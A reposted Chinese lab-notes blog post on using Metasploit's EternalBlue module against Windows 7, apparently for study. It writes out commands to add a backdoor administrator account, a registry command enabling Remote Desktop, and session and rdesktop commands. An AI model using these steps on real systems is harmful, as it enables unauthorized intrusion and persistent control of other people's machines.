kali系统——网络安全v6笔记总结(四)

利用永恒之蓝漏洞实现w7远程操控
首先目标要关闭防火墙
kali系统——网络安全v6笔记总结(四)
kali系统——网络安全v6笔记总结(四)
kali系统——网络安全v6笔记总结(四)
然后打开Metasploit
kali系统——网络安全v6笔记总结(四)
输入永恒之蓝漏洞编码
kali系统——网络安全v6笔记总结(四)
复制运行第二条辅助项目
kali系统——网络安全v6笔记总结(四)
设置漏洞选项
kali系统——网络安全v6笔记总结(四)
运行项目,结果为有一个可能是漏洞的w7漏洞
kali系统——网络安全v6笔记总结(四)
然后选择第三个项目,即***项目,并设置漏洞选项
kali系统——网络安全v6笔记总结(四)
kali系统——网络安全v6笔记总结(四)
输入漏洞***命令 exploit
kali系统——网络安全v6笔记总结(四)
于是我们便进入了对方的w7命令终端,身份为最高权限者system(系统)
kali系统——网络安全v6笔记总结(四)
下一步我们输入命令net user 用户名 密码 /add来创建一个用户
然后用一个 net localgroup administrators 用户名 /add 命令来将刚才的用户拉入讨论组
然后输入命令 net localgroup administrators 查看管理员

输入命令REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 来开启远程桌面端口3389

/v 所选项之下要添加的值名。
/t RegKey 数据类型
/d 要分配给添加的注册表 ValueName 的数据。
/f 不用提示就强行覆盖现有注册表项。
现在我们就可以利用其他漏洞进行以远程桌面控制为渠道的******了

sessions -l 列出会话
sessions -i <id>选择会话
sessions -k <id> 结束会话
<ctrl> z 把会话放在后台
<ctrl> c 结束会话

kali终端窗口
rdesktop 192.168.4.239:3389 远程连接命令

转载于:https://blog.51cto.com/14216854/2381436

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值